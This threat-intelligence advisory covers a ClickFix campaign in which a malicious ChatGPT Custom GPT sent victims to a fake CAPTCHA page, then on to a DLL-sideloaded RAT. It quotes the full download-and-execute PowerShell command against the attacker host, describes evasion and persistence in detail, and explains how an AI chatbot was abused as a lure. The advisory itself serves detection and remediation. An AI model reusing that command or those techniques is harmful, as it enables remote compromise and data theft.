Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix Campaign Delivering RAT via DLL Sideloading of Canon and Stardock Binaries
Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix (TL-2026-2766), also tracked as Plus 5.6 Custom GPT ClickFix campaign, is a high-severity malware campaign, first published 2026-09-29. It has no confirmed attribution, affects Microsoft Windows, maps to 24 MITRE ATT&CK techniques (T1027, T1027.003, T1036.005), and is covered by 9 detection rules and 34 indicators of compromise.
Key facts for TL-2026-2766
- Threat ID
- TL-2026-2766
- Also known as
- Plus 5.6 Custom GPT ClickFix campaign
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- 2026-09-29
- Last reviewed
- 2026-09-29
- Attribution confidence
- LOW
- Motivation
- UNKNOWN
- Target sectors
- general
- Target regions
- Global
- Detection rules
- 9
- Indicators of compromise
- 34
Attackers used Google malvertising and a malicious ChatGPT Custom GPT named "Plus 5.6" to push victims to a fake Cloudflare-style CAPTCHA on Google Sites, where a ClickFix prompt made them run PowerShell that installs a malicious MSI. The MSI sideloads a DLL through legitimately signed Canon (COTFileReadApp.exe) or Stardock (DeElevate64.exe) executables to load a previously undocumented RAT with dual persistence and DNS-over-HTTPS C2 resolution.
How Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix works
Huntress researchers documented a ClickFix campaign in which a trusted chatgpt.com-hosted Custom GPT is the first stage. Victims arrive via Google paid ads (with tracking parameters) at a Custom GPT titled "Plus 5.6", impersonating a ChatGPT model. The GPT is instructed to tell users the primary domain has "limited availability" and to visit a "backup domain", a Google Sites page (sites.google.com/view/antibot172881) that mimics a Cloudflare CAPTCHA with ChatGPT branding and prompts the user to paste and run a PowerShell command. Huntress SOC traced at least 40 incidents to the Google Sites domain, of which two were confirmed to come through a Custom GPT.
The pasted command is `PowerShell.exe -ExecutionPolicy Bypass "irm 1614733393/12 | Out-File $env:temp\1777.ps1;& $env:temp\1777.ps1"`, where 1614733393 is the decimal form of 96.62.224.81. The downloaded script (e.g. 6469.ps1 in V1, 5689.ps1 in V2) is heavily obfuscated with two layers of integer-based encoding (3,036 negative integers decoded by adding key 1520498; a second layer uses key 6178128) and downloads an MSI (ISOSimple.msi, display name "Advanced Printer Configuration Reader") from the same server, executed silently with msiexec /qn /norestart from a %TEMP%\<32 hex>_ISOSimple.msi path. The MSI installs 177 files under %LOCALAPPDATA%\Programs\ with ARPSYSTEMCOMPONENT=1 to hide it from Programs and Features, and launches the signed Canon CaptureOnTouch host COTFileReadApp.exe, which loads a patched ceiinfolog.dll (signature stripped, header checksum modified) that imports a malicious rdCore.dll (fake Polly version info). Additional helper DLLs WPFLocalizeExtension.dll (fake open-source version info) and WMPCL.dll ship alongside. The loader reads an encrypted shellcode blob hidden in a valid RIFF/WAVE file (Common.Integrator.Preview.wav, XOR-encrypted shellcode at offset 0x24362), applies an AMSI bypass, hosts the CLR, unhooks ntdll, and performs anti-VM checks (VMware, VirtualBox, Hyper-V, QEMU, Xen, Parallels) before decrypting monitor.raw, a custom encrypted file-system archive (1,128 entries) that holds a persistence script and the final ~1.58 MB position-independent RAT.
Persistence is an HKCU Run value plus a scheduled task, both named "Canon Configuration Reader", which a shutdown-monitoring script recreates (Run key checked about every 150 seconds, task about every 875 seconds). The RAT supports remote desktop sessions and screen broadcast, camera/microphone/system-audio capture, enumeration of 17 browsers, content-based file search, host reconnaissance (AV/Defender status via WMI, domain and domain-controller info, network adapters, open ports, installed software, Windows features, hardware fingerprint), C2 address resolution via DNS-over-HTTPS (Cloudflare, Google, Quad9) so no local DNS logging occurs, and execution of EXE, DLL (rundll32/regsvcs), MSI, PowerShell, batch, VBScript, JScript and ZIP payloads. Huntress frequently observed follow-on deployment of GOMCam2024.exe to %LOCALAPPDATA%\AppstorageFile\.
OpenAI removed the first Custom GPT by 2026-09-25 after Huntress reported it, but a replacement Custom GPT with the same title stayed active. A second variant found around 2026-09-27 swaps the host to Stardock's DeElevate64.exe (MSI IconEdit2Turb.msi, "Stardock Smart DeElevation Tool"), a patched DeElevator64.dll importing I++u.dll (fake SharpCompress info) with helper DLLs senddmp.resources.dll and res.dll, a NuGet-package-disguised loader carrier (Build.dat), the archive execute_engine_disconnect.raw, and a persistence name of "Stardock DeElevation Tool". Its stager is a two-stage script with a spoofed Chrome user agent, fresh obfuscation per request, and Mark-of-the-Web stripping before MSI execution. A third MSI (UltraFreeISOCreateWizardSolution.msi) was seen on the delivery server on 2026-09-23 but was not obtained. The malware family is unnamed in the sources and no actor attribution is given.
MITRE ATT&CK techniques used in TL-2026-2766
Defense Evasion
T1027 Obfuscated Files or Information; T1027.003 Steganography; T1036.005 Match Legitimate Resource Name or Location; T1140 Deobfuscate/Decode Files or Information; T1218.007 Msiexec; T1218.011 Rundll32; T1497.001 System Checks; T1564.001 Hidden Files and Directories; T1574.001 DLL; T1620 Reflective Code Loading
Persistence
T1053.005 Scheduled Task; T1547.001 Registry Run Keys / Startup Folder
Execution
T1059.001 PowerShell; T1204.004 Malicious Copy and Paste
Command and Control
T1071.004 DNS; T1219.002 Remote Desktop Software
Discovery
T1082 System Information Discovery; T1217 Browser Information Discovery; T1518.001 Security Software Discovery
Collection
T1123 Audio Capture; T1125 Video Capture
defense-impairment
T1553.005 Mark-of-the-Web Bypass; T1685 Disable or Modify Tools
Resource Development
Affected products and versions in Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix
- Microsoft — Windows
Vulnerable versions: Windows endpoints where users can run PowerShell and install per-user MSI packages - OpenAI — ChatGPT Custom GPTs (abused as a lure-hosting platform)
- Canon — CaptureOnTouch (COTFileReadApp.exe, signed binary abused for DLL sideloading)
- Stardock — SmartDeElevation (DeElevate64.exe, signed binary abused for DLL sideloading)
Remediation for Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix
Immediate actions
- Block 96.62.224.81 and 45.140.205.28 and alert on HTTP requests to the decimal-IP host 1614733393
- Hunt for powershell.exe spawning msiexec.exe /i against %TEMP%\<GUID>_*.msi with /qn /norestart
- Hunt for COTFileReadApp.exe or DeElevate64.exe running from %LOCALAPPDATA%\Programs\ and for an unsigned ceiinfolog.dll or DeElevator64.dll beside them
- Remove HKCU Run values and scheduled tasks named 'Canon Configuration Reader' or 'Stardock DeElevation Tool' only after isolating the host, because the implant recreates them
- Isolate affected hosts and treat browser-stored credentials as compromised
Workarounds
- Block or gate access to sites.google.com/view/* for endpoints where it is not required
- Application-control policy (WDAC/AppLocker) to block MSI installs and executables from %LOCALAPPDATA%\Programs by non-admin users
Longer-term hardening
- Train users that no legitimate CAPTCHA or AI-model page asks them to paste commands into the Windows Run dialog or PowerShell
- Restrict PowerShell (Constrained Language Mode, script block logging) and disable the Win+R Run dialog where feasible
- Add detections for unsigned or checksum-modified DLLs loaded by signed vendor executables running from user-writable paths
- Review paid-ad and AI-assistant link exposure in web filtering policy
Timeline of Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix
- Third MSI lure (UltraFreeISOCreateWizardSolution.msi) observed on the same delivery server (1614733393 / 96.62.224.81); not obtained for analysis.
- Compilation timestamp (22:46 UTC) of the malicious loader DLLs analysed by Huntress.
- A second 'Plus 5.6' Custom GPT with the same title remained active after the first was taken down, continuing to funnel victims to the Google Sites ClickFix page.
- OpenAI removed the first malicious 'Plus 5.6' Custom GPT after Huntress reported it.
- Replacement 'Plus 5.6' Custom GPT found active, delivering the same RAT via Stardock DeElevate64.exe sideloading (IconEdit2Turb.msi, Build.dat, execute_engine_disconnect.raw).
- Huntress published its technical write-up of the eight-stage chain, documenting at least 40 incidents traced to the Google Sites domain and two confirmed via a Custom GPT.
- Media coverage (Cyber Security News, IT Security Guru, Cryptika, Mallory) amplified the Huntress research; the replacement Custom GPT was still reported active at time of publication.
Sources cited for Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix
- Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix (Huntress)
- Hackers Weaponizing ChatGPT's Custom GPT Feature to Trick Victims into Installing Malware (Cyber Security News)
- Attackers weaponise ChatGPT Custom GPTs to deliver RAT via eight-stage ClickFix chain (IT Security Guru)
- Hackers Using ChatGPT's Custom GPT feature to Trick Victims into Installing Malware (Cryptika)
- Malicious ChatGPT Custom GPT Ads Deliver ClickFix RAT (Mallory)
- MITRE ATT&CK T1204.004 Malicious Copy and Paste
- MITRE ATT&CK T1574.002 DLL Side-Loading
More in malware
- Remcos RAT phishing campaign disguised as project material purchase requests exploits CVE-2017-0199 against Korean companies
- Infostealer-Stolen AI Service Logins Expose 80,000+ Corporate Domains (Shadow AI to LLMjacking)
- Infostealers Target Corporate AI Accounts, Sessions and API Keys (LLMjacking Risk)
- RatHat Android RAT: MaaS Consoles Add Gemini AI-Driven Victim Prioritization
- Poper Blocker Chrome Extension Spyware: Big Star Labs' 'Featured' Ad Blocker Exfiltrates Browsing History, Screenshots, and AI Chatbot Conversations From Millions
Detection coverage for TL-2026-2766
As of 2026-09-29, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2766 across Splunk SPL, Microsoft KQL and Sigma, covering 34 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.